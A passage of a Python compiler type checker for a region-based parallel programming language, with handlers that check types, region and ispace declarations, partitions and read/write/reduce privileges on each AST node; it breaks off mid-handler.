assert types.is_kind(return_kind)
return_type = return_kind.type
fn_type = types.Function(param_types, cx.privileges, return_type)
# Insert function name into global scope. Second insert
# prevents parameters from shadowing function name.
original_cx.insert(node, fn_name, fn_type)
cx.insert(node, fn_name, fn_type)
type_check_node(node.block, cx.with_return_type(return_type))
return fn_type
@type_check_node.register(ast.FunctionName)
def _(node, cx):
return node.name
@type_check_node.register(ast.FunctionParams)
def _(node, cx):
return [type_check_node(param, cx)
for param in node.params]
@type_check_node.register(ast.FunctionParam)
def _(node, cx):
if isinstance(node.declared_type, ast.TypeRegionKind):
# Region types may be self-referential. Insert regions
# into scope early to handle recursive types.
region_type = types.Region(node.name, types.RegionKind(None, None))
cx.region_forest.add(region_type)
cx.insert(node, node.name, region_type)
region_kind = type_check_node(node.declared_type, cx)
region_type.kind = region_kind
if not region_type.validate_regions():
raise types.TypeError(node, 'Region type is inconsistent with itself: %s' % region_type.pretty_kind())
return region_type
if isinstance(node.declared_type, ast.TypeArrayKind):
# Region types may be self-referential. Insert regions
# into scope early to handle recursive types.
region_type = types.Region(node.name, types.RegionKind(None, None))
cx.region_forest.add(region_type)
cx.insert(node, node.name, region_type)
region_kind = type_check_node(node.declared_type, cx)
region_type.kind = region_kind
return region_type
if isinstance(node.declared_type, ast.TypeIspaceKind):
ispace_kind = type_check_node(node.declared_type, cx)
ispace_type = types.Ispace(node.name, ispace_kind)
cx.insert(node, node.name, ispace_type)
return ispace_type
# Handle non-region types:
declared_kind = type_check_node(node.declared_type, cx)
assert types.is_kind(declared_kind)
declared_type = declared_kind.type
if types.is_void(declared_type):
raise types.TypeError(node, 'Task parameters are not allowed to be void')
if not types.is_concrete(declared_type):
raise types.TypeError(node, 'Task parameters are not allowed to contain wildcards')
assert types.allows_var_binding(declared_type)
reference_type = types.StackReference(declared_type)
cx.insert(node, node.name, reference_type)
return declared_type
@type_check_node.register(ast.FunctionReturnType)
def _(node, cx):
return type_check_node(node.declared_type, cx)
@type_check_node.register(ast.FunctionPrivileges)
def _(node, cx):
return cx.privileges | set(
privilege
for privilege_node in node.privileges
for privilege in type_check_node(privilege_node, cx))
@type_check_node.register(ast.FunctionPrivilege)
def _(node, cx):
return type_check_node(node.privilege, cx)
@type_check_node.register(ast.TypeVoid)
def _(node, cx):
return types.Kind(types.Void())
@type_check_node.register(ast.TypeBool)
def _(node, cx):
return types.Kind(types.Bool())
@type_check_node.register(ast.TypeDouble)
def _(node, cx):
return types.Kind(types.Double())
@type_check_node.register(ast.TypeFloat)
def _(node, cx):
return types.Kind(types.Float())
@type_check_node.register(ast.TypeInt)
def _(node, cx):
return types.Kind(types.Int())
@type_check_node.register(ast.TypeUInt)
def _(node, cx):
return types.Kind(types.UInt())
@type_check_node.register(ast.TypeInt8)
def _(node, cx):
return types.Kind(types.Int8())
@type_check_node.register(ast.TypeInt16)
def _(node, cx):
return types.Kind(types.Int16())
@type_check_node.register(ast.TypeInt32)
def _(node, cx):
return types.Kind(types.Int32())
@type_check_node.register(ast.TypeInt64)
def _(node, cx):
return types.Kind(types.Int64())
@type_check_node.register(ast.TypeUInt8)
def _(node, cx):
return types.Kind(types.UInt8())
@type_check_node.register(ast.TypeUInt16)
def _(node, cx):
return types.Kind(types.UInt16())
@type_check_node.register(ast.TypeUInt32)
def _(node, cx):
return types.Kind(types.UInt32())
@type_check_node.register(ast.TypeUInt64)
def _(node, cx):
return types.Kind(types.UInt64())
@type_check_node.register(ast.TypeColoring)
def _(node, cx):
region = type_check_node(node.region, cx)
if not (types.is_region(region) or types.is_ispace(region)):
raise types.TypeError(node, 'Type mismatch in type %s: expected %s but got %s' % (
'coloring', 'a region or ispace', region))
return types.Kind(types.Coloring(region))
@type_check_node.register(ast.TypeColoringRegion)
def _(node, cx):
return cx.lookup(node, node.name)
@type_check_node.register(ast.TypeID)
def _(node, cx):
kind = cx.lookup(node, node.name)
args = type_check_node(node.args, cx)
if not types.is_kind(kind):
raise types.TypeError(node, 'Type mismatch in type %s: expected a type but got %s' % (
node.name, kind))
if len(args) != len(kind.type.params):
raise types.TypeError(node, 'Incorrect number of arguments for struct %s: expected %s but got %s' % (
node.name, len(kind.type.params), len(args)))
region_map = dict([
(old_region, new_region)
for old_region, new_region in zip(kind.type.params, args)])
for param, arg in zip(kind.type.params, args):
assert types.is_region(param)
if types.is_region(arg):
if param.kind.contains_type is not None and arg.kind.contains_type is not None:
param_kind = param.kind.substitute_regions(region_map)
arg_kind = arg.kind
if param_kind != arg_kind:
raise types.TypeError(node, 'Type mismatch in type parameter to %s: expected %s but got %s' % (
node.name, param_kind, arg_kind))
elif types.is_region_wild(arg):
pass
else:
assert False
return kind.instantiate_params(region_map)
@type_check_node.register(ast.TypeArgs)
def _(node, cx):
return [type_check_node(arg, cx) for arg in node.args]
@type_check_node.register(ast.TypeArg)
def _(node, cx):
arg = cx.lookup(node, node.name)
if not types.is_region(arg):
raise types.TypeError(node, 'Type mismatch in type %s: expected a region but got %s' % (
node.name, arg))
return arg
@type_check_node.register(ast.TypeArgWild)
def _(node, cx):
return types.RegionWild()
@type_check_node.register(ast.TypePointer)
def _(node, cx):
points_to_kind = type_check_node(node.points_to_type, cx)
regions = type_check_node(node.regions, cx)
assert types.is_kind(points_to_kind)
points_to_type = points_to_kind.type
for region in regions:
if types.is_region(region):
contains_type = region.kind.contains_type
if contains_type is not None and contains_type != points_to_type:
raise types.TypeError(node, 'Type mismatch in pointer type: expected %s but got %s' % (
contains_type, points_to_type))
elif types.is_region_wild(region):
pass
else:
if not types.is_kind(region):
raise types.TypeError(node, 'Type mismatch in pointer type: expected a region but got %s' % (
region))
raise types.TypeError(node, 'Type mismatch in pointer type: expected a region but got %s' % (
region.type))
return types.Kind(types.Pointer(points_to_type, regions))
@type_check_node.register(ast.TypePointerRegions)
def _(node, cx):
return [type_check_node(region, cx)
for region in node.regions]
@type_check_node.register(ast.TypeRegion)
def _(node, cx):
region_type = cx.lookup(node, node.name)
return region_type
@type_check_node.register(ast.TypeRegionWild)
def _(node, cx):
return types.RegionWild()
@type_check_node.register(ast.TypeRegionKind)
def _(node, cx):
contains_type = None
if node.contains_type is not None:
contains_type = type_check_node(node.contains_type, cx).type
return types.RegionKind(None, contains_type)
@type_check_node.register(ast.TypeArrayKind)
def _(node, cx):
ispace = type_check_node(node.ispace, cx)
contains_type = type_check_node(node.contains_type, cx).type
return types.RegionKind(ispace, contains_type)
@type_check_node.register(ast.TypeIspace)
def _(node, cx):
ispace_type = cx.lookup(node, node.name)
return ispace_type
@type_check_node.register(ast.TypeIspaceKind)
def _(node, cx):
index_type = type_check_node(node.index_type, cx).type
return types.IspaceKind(index_type)
@type_check_node.register(ast.Privilege)
def _(node, cx):
if node.privilege == 'reads':
privilege = types.Privilege.READ
elif node.privilege == 'writes':
privilege = types.Privilege.WRITE
elif node.privilege == 'reduces':
privilege = types.Privilege.REDUCE
else:
assert False
regions = type_check_node(node.regions, cx)
return [
types.Privilege(node, privilege, node.op, region, field_path)
for region, field_path in regions]
@type_check_node.register(ast.PrivilegeRegions)
def _(node, cx):
return [
region
for region_node in node.regions
for region in type_check_node(region_node, cx)]
@type_check_node.register(ast.PrivilegeRegion)
def _(node, cx):
region = cx.lookup(node, node.name)
field_paths = type_check_node(node.fields, cx)
return [(region, field_path) for field_path in field_paths]
@type_check_node.register(ast.PrivilegeRegionFields)
def _(node, cx):
if len(node.fields) == 0:
return [()]
return [
field_path
for field_node in node.fields
for field_path in type_check_node(field_node, cx)]
@type_check_node.register(ast.PrivilegeRegionField)
def _(node, cx):
prefix = (node.name,)
field_paths = type_check_node(node.fields, cx)
return [prefix + field_path for field_path in field_paths]
@type_check_node.register(ast.Block)
def _(node, cx):
cx = cx.new_block_scope()
for expr in node.block:
type_check_node(expr, cx)
return types.Void()
@type_check_node.register(ast.StatementAssert)
def _(node, cx):
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
if not types.is_bool(expr_type):
raise types.TypeError(node, 'Type mismatch in assert statement: expected %s but got %s' % (
types.Bool(), expr_type))
return types.Void()
@type_check_node.register(ast.StatementExpr)
def _(node, cx):
type_check_node(node.expr, cx).check_read(node.expr, cx)
return types.Void()
@type_check_node.register(ast.StatementIf)
def _(node, cx):
condition_type = type_check_node(node.condition, cx).check_read(node.condition, cx)
type_check_node(node.then_block, cx)
if node.else_block is not None:
type_check_node(node.else_block, cx)
if not types.is_bool(condition_type):
raise types.TypeError(node, 'If condition expression is not type bool')
return types.Void()
@type_check_node.register(ast.StatementFor)
def _(node, cx):
cx = cx.new_block_scope()
index_types = type_check_node(node.indices, cx)
region_types = type_check_node(node.regions, cx)
if len(index_types) != len(region_types):
raise types.TypeError(node, 'Incorrect number of indices in for statement: expected %s but got %s' % (
len(region_types), len(index_types)))
# Two forms of iteration are supported, over a single index
# space, or over any number of regions. In the case where
# multiple regions are being iterated, it is assumed the
# regions have the same index space. At the moment this has to
# be checked dynamically to be sound.
if len(region_types) == 1 and types.is_ispace(region_types[0]):
index_node = node.indices.indices[0]
index_type = index_types[0]
ispace_type = region_types[0]
# We can infer the index type if unspecified.
if index_type is None:
index_type = ispace_type.kind.index_type
if index_type != ispace_type.kind.index_type:
raise types.TypeError(node, 'Type mismatch in for statement: expected %s but got %s' % (
index_type, ispace_type.kind.index_type))
# Patch environment and type map to know about the inferred index type.
cx.insert(node, index_node.name, index_type)
cx.type_map[index_node] = index_type
else:
for index_node, index_type, region_type, index \
in zip(node.indices.indices, index_types, region_types, xrange(len(index_types))):
if not types.is_region(region_type):
raise types.TypeError(node, 'Type mismatch on index %s of for statement: expected a region but got %s' % (
index, region_type))
# We can infer the index type as long as the region is explicitly typed.
if index_type is None:
if region_type.kind.contains_type is None:
raise types.TypeError(node, 'Unable to infer type of index %s of for statement: region %s has no element type' % (
index, region_type))
index_type = types.Pointer(region_type.kind.contains_type, [region_type])
if not types.is_pointer(index_type):
raise types.TypeError(node, 'Type mismatch on index %s of for statement: expected a pointer but got %s' % (
index, index_type))
if len(index_type.regions) != 1 or index_type.regions[0] != region_type:
raise types.TypeError(node, 'Type mismatch on index %s of for statement: expected %s but got %s' % (
index, index_type,
types.Pointer(region_type.kind.contains_type, [region_type])))
# Patch environment and type map to know about the inferred index type.
cx.insert(node, index_node.name, index_type)
cx.type_map[index_node] = index_type
type_check_node(node.block, cx)
return types.Void()
@type_check_node.register(ast.ForIndices)
def _(node, cx):
return [type_check_node(index, cx)
for index in node.indices]
@type_check_node.register(ast.ForIndex)
def _(node, cx):
if node.type is not None:
declared_kind = type_check_node(node.type, cx)
assert types.is_kind(declared_kind)
return declared_kind.type
return None
@type_check_node.register(ast.ForRegions)
def _(node, cx):
return [type_check_node(region, cx)
for region in node.regions]
@type_check_node.register(ast.ForRegion)
def _(node, cx):
region_type = cx.lookup(node, node.name)
return region_type
@type_check_node.register(ast.StatementLet)
def _(node, cx):
declared_type = None
if node.type is not None:
declared_kind = type_check_node(node.type, cx)
if types.is_region_kind(declared_kind):
declared_type = types.Region(node.name, declared_kind)
cx.region_forest.add(declared_type)
if types.is_kind(declared_kind):
declared_type = declared_kind.type
else:
assert False
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
    # Hack: Rather than full type inference, which gets ugly fast, just
# implement "auto-style" inference by using the expression
# type if no type declaration is provided.
if declared_type is None:
if types.is_region(expr_type):
declared_type = types.Region(node.name, expr_type.kind)
cx.region_forest.add(declared_type)
else:
declared_type = expr_type
if not types.is_concrete(declared_type):
raise types.TypeError(node, 'Let bound expressions are not allowed to contain wildcards')
if types.is_void(declared_type):
raise types.TypeError(node, 'Let bound expressions are not allowed to be void')
if types.is_region(expr_type) and types.is_region(declared_type):
if expr_type.kind != declared_type.kind:
raise types.TypeError(node, 'Let bound expression of type %s does not match declared type %s' % (
expr_type.kind, declared_type.kind))
else:
if expr_type != declared_type:
raise types.TypeError(node, 'Let bound expression of type %s does not match declared type %s' % (
expr_type, declared_type))
cx.insert(node, node.name, declared_type, shadow = True)
if types.is_region(expr_type):
cx.region_forest.union(declared_type, expr_type)
cx.constraints.add(
types.Constraint(lhs = expr_type, op = types.Constraint.SUBREGION, rhs = declared_type))
cx.constraints.add(
types.Constraint(lhs = declared_type, op = types.Constraint.SUBREGION, rhs = expr_type))
return declared_type
@type_check_node.register(ast.StatementLetRegion)
def _(node, cx):
region_type = types.Region(node.name, types.RegionKind(None, None))
cx.region_forest.add(region_type)
# Insert region name into scope so that element type can refer to it.
cx.insert(node, node.name, region_type)
declared_region_kind = None
if node.region_kind is not None:
declared_region_kind = type_check_node(node.region_kind, cx)
element_kind = type_check_node(node.element_type, cx)
size_type = type_check_node(node.size_expr, cx).check_read(node.size_expr, cx)
assert types.is_kind(element_kind) and not types.is_void(element_kind.type)
if not types.is_int(size_type):
raise types.TypeError(node, 'Type mismatch in region: expected %s but got %s' % (
types.Int(), size_type))
# Now patch region type so that it refers to the contained type.
region_kind = types.RegionKind(None, element_kind.type)
region_type.kind = region_kind
if not region_type.validate_regions():
raise types.TypeError(node, 'Region type is inconsistent with itself: %s' % region_type.pretty_kind())
if declared_region_kind is None:
declared_region_kind = region_kind
if declared_region_kind != region_kind:
raise types.TypeError(node, 'Let bound expression of type %s does not match declared type %s' % (
region_kind, declared_region_kind))
cx.privileges.add(types.Privilege(node, types.Privilege.READ, None, region_type, ()))
cx.privileges.add(types.Privilege(node, types.Privilege.WRITE, None, region_type, ()))
return region_type
@type_check_node.register(ast.StatementLetArray)
def _(node, cx):
ispace_type = type_check_node(node.ispace_type, cx)
region_type = types.Region(node.name, types.RegionKind(ispace_type, None))
cx.region_forest.add(region_type)
# insert region name into scope so that element type can refer to it
cx.insert(node, node.name, region_type)
declared_region_kind = None
if node.region_kind is not None:
declared_region_kind = type_check_node(node.region_kind, cx)
element_kind = type_check_node(node.element_type, cx)
assert types.is_kind(element_kind) and not types.is_void(element_kind.type)
# now patch region type so that it refers to the contained type
region_kind = types.RegionKind(ispace_type, element_kind.type)
region_type.kind = region_kind
if declared_region_kind is None:
declared_region_kind = region_kind
if declared_region_kind != region_kind:
raise types.TypeError(node, 'Let bound expression of type %s does not match declared type %s' % (
region_kind, declared_region_kind))
cx.privileges.add(types.Privilege(node, types.Privilege.READ, None, region_type, ()))
cx.privileges.add(types.Privilege(node, types.Privilege.WRITE, None, region_type, ()))
return region_type
@type_check_node.register(ast.StatementLetIspace)
def _(node, cx):
declared_ispace_kind = None
if node.ispace_kind is not None:
declared_ispace_kind = type_check_node(node.ispace_kind, cx)
index_kind = type_check_node(node.index_type, cx)
size_type = type_check_node(node.size_expr, cx).check_read(node.size_expr, cx)
assert types.is_kind(index_kind) and types.is_int(index_kind.type)
if not types.is_int(size_type):
raise types.TypeError(node, 'Type mismatch in ispace: expected %s but got %s' % (
types.Int(), size_type))
ispace_kind = types.IspaceKind(index_kind.type)
if declared_ispace_kind is None:
declared_ispace_kind = ispace_kind
if declared_ispace_kind != ispace_kind:
raise types.TypeError(node, 'Let bound expression of type %s does not match declared type %s' % (
ispace_kind, declared_ispace_kind))
ispace_type = types.Ispace(node.name, ispace_kind)
cx.insert(node, node.name, ispace_type)
return types.Void()
@type_check_node.register(ast.StatementLetPartition)
def _(node, cx):
region_type = type_check_node(node.region_type, cx).check_read(node.region_type, cx)
mode = type_check_node(node.mode, cx)
coloring_type = type_check_node(node.coloring_expr, cx).check_read(node.coloring_expr, cx)
if not (types.is_region(region_type) or types.is_ispace(region_type)):
raise types.TypeError(node, 'Type mismatch in partition: expected a region or ispace but got %s' % (
region_type))
expected_coloring_type = types.Coloring(region_type)
if coloring_type != expected_coloring_type:
raise types.TypeError(node, 'Type mismatch in partition: expected %s but got %s' % (
expected_coloring_type, coloring_type))
partition_kind = types.PartitionKind(region_type, mode)
partition_type = types.Partition(node.name, partition_kind)
cx.insert(node, node.name, partition_type)
return partition_type
@type_check_node.register(ast.PartitionMode)
def _(node, cx):
if node.mode == 'disjoint':
return types.Partition.DISJOINT
elif node.mode == 'aliased':
return types.Partition.ALIASED
assert False
@type_check_node.register(ast.StatementReturn)
def _(node, cx):
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
if expr_type != cx.return_type:
raise types.TypeError(node, 'Returned expression of type %s does not match declared return type %s' % (
expr_type, cx.return_type))
return types.Void()
@type_check_node.register(ast.StatementUnpack)
def _(node, cx):
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
declared_kind = type_check_node(node.type, cx)
assert types.is_kind(declared_kind)
declared_type = declared_kind.type
if not types.is_struct(expr_type):
raise types.TypeError(node, 'Type mismatch in unpack: expected %s but got %s' % (
'a struct', expr_type))
region_types = type_check_node(node.regions, cx)
for region, region_type in zip(node.regions.regions, region_types):
cx.insert(node, region.name, region_type) # FIXME: handle shadowing
region_map = dict(zip(declared_type.regions, region_types))
actual_type = declared_type.instantiate_regions(region_map)
# Patch regions so that they contain the correct type.
for region_type, declared_region_type in zip(region_types, declared_type.regions):
region_type.kind = declared_region_type.kind.substitute_regions(region_map)
if expr_type != declared_type:
raise types.TypeError(node, 'Type mismatch in unpack: expected %s but got %s' % (
declared_type, expr_type))
cx.insert(node, node.name, actual_type) # FIXME: handle shadowing
cx.constraints.update(actual_type.constraints)
return region_types
@type_check_node.register(ast.UnpackRegions)
def _(node, cx):
return [type_check_node(region, cx) for region in node.regions]
@type_check_node.register(ast.UnpackRegion)
def _(node, cx):
# Create regions with empty region_types initially, patch later.
region_type = types.Region(node.name, types.RegionKind(None, None))
cx.region_forest.add(region_type)
return region_type
@type_check_node.register(ast.StatementVar)
def _(node, cx):
declared_type = None
if node.type is not None:
declared_kind = type_check_node(node.type, cx)
assert types.is_kind(declared_kind)
declared_type = declared_kind.type
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
    # Hack: Rather than full type inference, which gets ugly fast, just
# implement "auto-style" inference by using the expression
# type if no type declaration is provided.
if declared_type is None:
declared_type = expr_type
if not types.is_concrete(declared_type):
raise types.TypeError(node, 'Variables are not allowed to contain wildcards')
if expr_type != declared_type:
raise types.TypeError(node, 'Variable initializer of type %s does not match declared type %s' % (
expr_type, declared_type))
assert types.allows_var_binding(declared_type)
reference_type = types.StackReference(declared_type)
cx.insert(node, node.name, reference_type, shadow = True)
return types.Void()
@type_check_node.register(ast.StatementWhile)
def _(node, cx):
condition_type = type_check_node(node.condition, cx).check_read(node.condition, cx)
type_check_node(node.block, cx)
if not types.is_bool(condition_type):
raise types.TypeError(node, 'While condition expression is not type bool')
return types.Void()
@type_check_node.register(ast.ExprID)
def _(node, cx):
id_type = cx.lookup(node, node.name)
return id_type
@type_check_node.register(ast.ExprAssignment)
def _(node, cx):
lval_type = type_check_node(node.lval, cx).check_write(node.lval, cx)
rval_type = type_check_node(node.rval, cx).check_read(node.rval, cx)
if lval_type != rval_type:
raise types.TypeError(node, 'Type mismatch in assignment: %s and %s' % (
lval_type, rval_type))
return rval_type
@type_check_node.register(ast.ExprUnaryOp)
def _(node, cx):
arg_type = type_check_node(node.arg, cx).check_read(node.arg, cx)
if not unary_operator_table[node.op][0](arg_type):
raise types.TypeError(node, 'Type mismatch in operand to unary operator: %s' % (
arg_type))
return unary_operator_table[node.op][1](arg_type)
@type_check_node.register(ast.ExprBinaryOp)
def _(node, cx):
lhs_type = type_check_node(node.lhs, cx).check_read(node.lhs, cx)
rhs_type = type_check_node(node.rhs, cx).check_read(node.rhs, cx)
if lhs_type != rhs_type:
raise types.TypeError(node, 'Type mismatch in operands to binary operator: %s and %s' % (
lhs_type, rhs_type))
if not binary_operator_table[node.op][0](lhs_type):
raise types.TypeError(node, 'Type mismatch in operand to binary operator: %s' % (
lhs_type))
if not binary_operator_table[node.op][0](rhs_type):
raise types.TypeError(node, 'Type mismatch in operand to binary operator: %s' % (
rhs_type))
return binary_operator_table[node.op][1](lhs_type, rhs_type)
@type_check_node.register(ast.ExprReduceOp)
def _(node, cx):
lhs_type = type_check_node(node.lhs, cx).check_reduce(node.lhs, node.op, cx)
rhs_type = type_check_node(node.rhs, cx).check_read(node.rhs, cx)
if lhs_type != rhs_type:
raise types.TypeError(node, 'Type mismatch in operands to binary operator: %s and %s' % (
lhs_type, rhs_type))
if not reduce_operator_table[node.op](lhs_type):
raise types.TypeError(node, 'Type mismatch in operand to binary operator: %s' % (
lhs_type))
if not reduce_operator_table[node.op](rhs_type):
raise types.TypeError(node, 'Type mismatch in operand to binary operator: %s' % (
rhs_type))
return types.Void()
@type_check_node.register(ast.ExprCast)
def _(node, cx):
cast_to_kind = type_check_node(node.cast_to_type, cx)
assert types.is_kind(cast_to_kind) and types.is_numeric(cast_to_kind.type)
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
if not types.is_numeric(expr_type):
raise types.TypeError(node, 'Type mismatch in cast: expected a number but got %s' % (
expr_type))
return cast_to_kind.type
@type_check_node.register(ast.ExprNull)
def _(node, cx):
pointer_kind = type_check_node(node.pointer_type, cx)
assert types.is_kind(pointer_kind) and types.is_pointer(pointer_kind.type)
return pointer_kind.type
@type_check_node.register(ast.ExprIsnull)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
0, 'isnull', 'a pointer', pointer_type))
return types.Bool()
@type_check_node.register(ast.ExprNew)
def _(node, cx):
pointer_kind = type_check_node(node.pointer_type, cx)
assert types.is_kind(pointer_kind) and types.is_pointer(pointer_kind.type)
pointer_type = pointer_kind.type
if len(pointer_type.regions) != 1:
raise types.TypeError(node, 'Type mismatch in new: cannot allocate pointer with more than one region %s' % (
pointer_type))
region_type = pointer_type.regions[0]
if region_type.kind.ispace is not None:
raise types.TypeError(node, 'Type mismatch in new: cannot allocate into array %s' %
region_type)
return pointer_type
@type_check_node.register(ast.ExprRead)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch in read: expected a pointer but got %s' % (
pointer_type))
privileges_requested = [
types.Privilege(node, types.Privilege.READ, None, region, ())
for region in pointer_type.regions]
success, failed_request = types.check_privileges(privileges_requested, cx)
if not success:
raise types.TypeError(node, 'Invalid privilege %s requested in read' % failed_request)
value_type = pointer_type.points_to_type
return value_type
@type_check_node.register(ast.ExprWrite)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
value_type = type_check_node(node.value_expr, cx).check_read(node.value_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch in write: expected a pointer but got %s' % (
pointer_type))
if pointer_type.points_to_type != value_type:
raise types.TypeError(node, 'Type mismatch in write: expected %s but got %s' % (
value_type, pointer_type.points_to_type))
privileges_requested = [
types.Privilege(node, types.Privilege.WRITE, None, region, ())
for region in pointer_type.regions]
success, failed_request = types.check_privileges(privileges_requested, cx)
if not success:
raise types.TypeError(node, 'Invalid privilege %s requested in write' % failed_request)
return types.Void()
@type_check_node.register(ast.ExprReduce)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
value_type = type_check_node(node.value_expr, cx).check_read(node.value_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch in reduce: expected a pointer but got %s' % (
pointer_type))
if pointer_type.points_to_type != value_type:
raise types.TypeError(node, 'Type mismatch in reduce: %s and %s' % (
pointer_type.points_to_type, value_type))
if not reduce_operator_table[node.op](pointer_type.points_to_type):
raise types.TypeError(node, 'Type mismatch in reduce: %s' % (
pointer_type.points_to_type))
if not reduce_operator_table[node.op](value_type):
raise types.TypeError(node, 'Type mismatch in reduce: %s' % (
value_type))
privileges_requested = [
types.Privilege(node, types.Privilege.REDUCE, node.op, region, ())
for region in pointer_type.regions]
success, failed_request = types.check_privileges(privileges_requested, cx)
if not success:
raise types.TypeError(node, 'Invalid privilege %s requested in reduce' % failed_request)
return types.Void()
@type_check_node.register(ast.ExprDereference)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch in pointer dereference: expected a pointer but got %s' % (
pointer_type))
reference_type = types.Reference(
refers_to_type = pointer_type.points_to_type,
regions = pointer_type.regions)
return reference_type
@type_check_node.register(ast.ExprArrayAccess)
def _(node, cx):
array_type = type_check_node(node.array_expr, cx).check_read(node.array_expr, cx)
index_type = type_check_node(node.index_expr, cx).check_read(node.index_expr, cx)
# Handle partitions:
if types.is_partition(array_type):
if not types.is_int(index_type):
raise types.TypeError(node, 'Type mismatch in index for partition access: expected %s but got %s' % (
types.Int(),
index_type))
# Check whether the index expression is a compile-time
# constant value. Add disjointness constraints for the
        # subregion if and only if the index is constant.
if isinstance(node.index_expr, ast.ExprConstInt):
index = node.index_expr.value
subregion_type = array_type.static_subregion(index, cx)
else:
index_expr = node.index_expr
subregion_type = array_type.dynamic_subregion(index_expr, cx)
return subregion_type
# Handle array slicing:
if types.is_region(array_type) and types.is_ispace(index_type):
if array_type.kind.ispace is None:
raise types.TypeError(node, 'Type mismatch in array slice: expected an array but got %s' % (
array_type))
# Check constraints for the index space to make sure it is
# a subset of the index space of the array.
success, failed_request = types.check_constraints(
[types.Constraint(lhs = index_type, op = types.Constraint.SUBREGION, rhs = array_type.kind.ispace)],
cx.constraints)
if not success:
raise types.TypeError(node, 'Invalid constraint %s requested in array slice' % (
'%s <= %s' % (index_type, array_type.kind.ispace)))
array_kind = types.RegionKind(index_type, array_type.kind.contains_type)
subarray_type = types.Region('%s[%s]' % (array_type, index_type), array_kind)
cx.region_forest.union(subarray_type, array_type)
return subarray_type
# Handle arrays:
if not types.is_region(array_type):
raise types.TypeError(node, 'Type mismatch in array access: expected an array but got %s' % (
array_type))
ispace = array_type.kind.ispace
if ispace is None:
raise types.TypeError(node, 'Type mismatch in array access: expected an array but got %s' % (
array_type.kind))
if ispace.kind.index_type != index_type:
raise types.TypeError(node, 'Type mismatch in index for array access: expected %s but got %s' % (
ispace.kind.index_type,
index_type))
reference_type = types.Reference(
refers_to_type = array_type.kind.contains_type,
regions = [array_type])
return reference_type
@type_check_node.register(ast.ExprFieldAccess)
def _(node, cx):
wrapper_type = type_check_node(node.struct_expr, cx)
struct_type = wrapper_type.as_read()
if not types.is_struct(struct_type):
raise types.TypeError(node, 'Type mismatch in struct field access: expected a struct but got %s' % (
struct_type))
if node.field_name not in struct_type.field_map:
raise types.TypeError(node, 'Struct %s has no field named %s' % (
struct_type, node.field_name))
return wrapper_type.get_field(node.field_name)
@type_check_node.register(ast.ExprFieldDereference)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch in struct field dereference: expected a pointer to a struct but got %s' % (
pointer_type))
if not types.is_struct(pointer_type.points_to_type):
raise types.TypeError(node, 'Type mismatch in struct field dereference: expected a pointer to a struct but got %s' % (
pointer_type))
if node.field_name not in pointer_type.points_to_type.field_map:
raise types.TypeError(node, 'Struct %s has no field named %s' % (
pointer_type.points_to_type, node.field_name))
return types.Reference(pointer_type.points_to_type, pointer_type.regions).get_field(node.field_name)
@type_check_node.register(ast.ExprFieldValues)
def _(node, cx):
field_values = type_check_node(node.field_values, cx)
field_map = OrderedDict()
for field_name, value_type in field_values:
field_map[field_name] = value_type
struct_type = types.Struct(None, [], [], set(), field_map)
return struct_type
@type_check_node.register(ast.FieldValues)
def _(node, cx):
return [type_check_node(field_value, cx)
for field_value in node.field_values]
@type_check_node.register(ast.FieldValue)
def _(node, cx):
return (
node.field_name,
type_check_node(node.value_expr, cx).check_read(node.value_expr, cx))
@type_check_node.register(ast.ExprFieldUpdates)
def _(node, cx):
struct_type = type_check_node(node.struct_expr, cx).check_read(node.struct_expr, cx)
field_updates = type_check_node(node.field_updates, cx)
if not types.is_struct(struct_type):
raise types.TypeError(node, 'Type mismatch in struct field updates: expected a struct but got %s' % (
struct_type))
all_fields_match = True
for field_name, update_type in field_updates:
assert field_name in struct_type.field_map
if update_type != struct_type.field_map[field_name]:
all_fields_match = False
if all_fields_match:
new_struct_type = struct_type
else:
new_field_map = struct_type.field_map.copy()
for field_name, update_type in field_updates:
new_field_map[field_name] = update_type
new_struct_type = types.Struct(None, [], [], set(), new_field_map)
return new_struct_type
@type_check_node.register(ast.FieldUpdates)
def _(node, cx):
return [type_check_node(field_update, cx)
for field_update in node.field_updates]
@type_check_node.register(ast.FieldUpdate)
def _(node, cx):
return (
node.field_name,
type_check_node(node.update_expr, cx).check_read(node.update_expr, cx))
@type_check_node.register(ast.ExprColoring)
def _(node, cx):
region_type = type_check_node(node.region, cx).check_read(node.region, cx)
if not (types.is_region(region_type) or types.is_ispace(region_type)):
raise types.TypeError(node, 'Type mismatch in coloring: expected a region or ispace but got %s' % (
region_type))
return types.Coloring(region_type)
@type_check_node.register(ast.ColoringRegion)
def _(node, cx):
return cx.lookup(node, node.name)
@type_check_node.register(ast.ExprColor)
def _(node, cx):
coloring_type = type_check_node(node.coloring_expr, cx).check_read(node.coloring_expr, cx)
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
color_type = type_check_node(node.color_expr, cx).check_read(node.color_expr, cx)
if not types.is_coloring(coloring_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
0, 'color', 'a coloring', coloring_type))
if types.is_region(coloring_type.region):
expected_pointer_type = types.Pointer(
coloring_type.region.kind.contains_type,
[coloring_type.region])
elif types.is_ispace(coloring_type.region):
expected_pointer_type = coloring_type.region.kind.index_type
else:
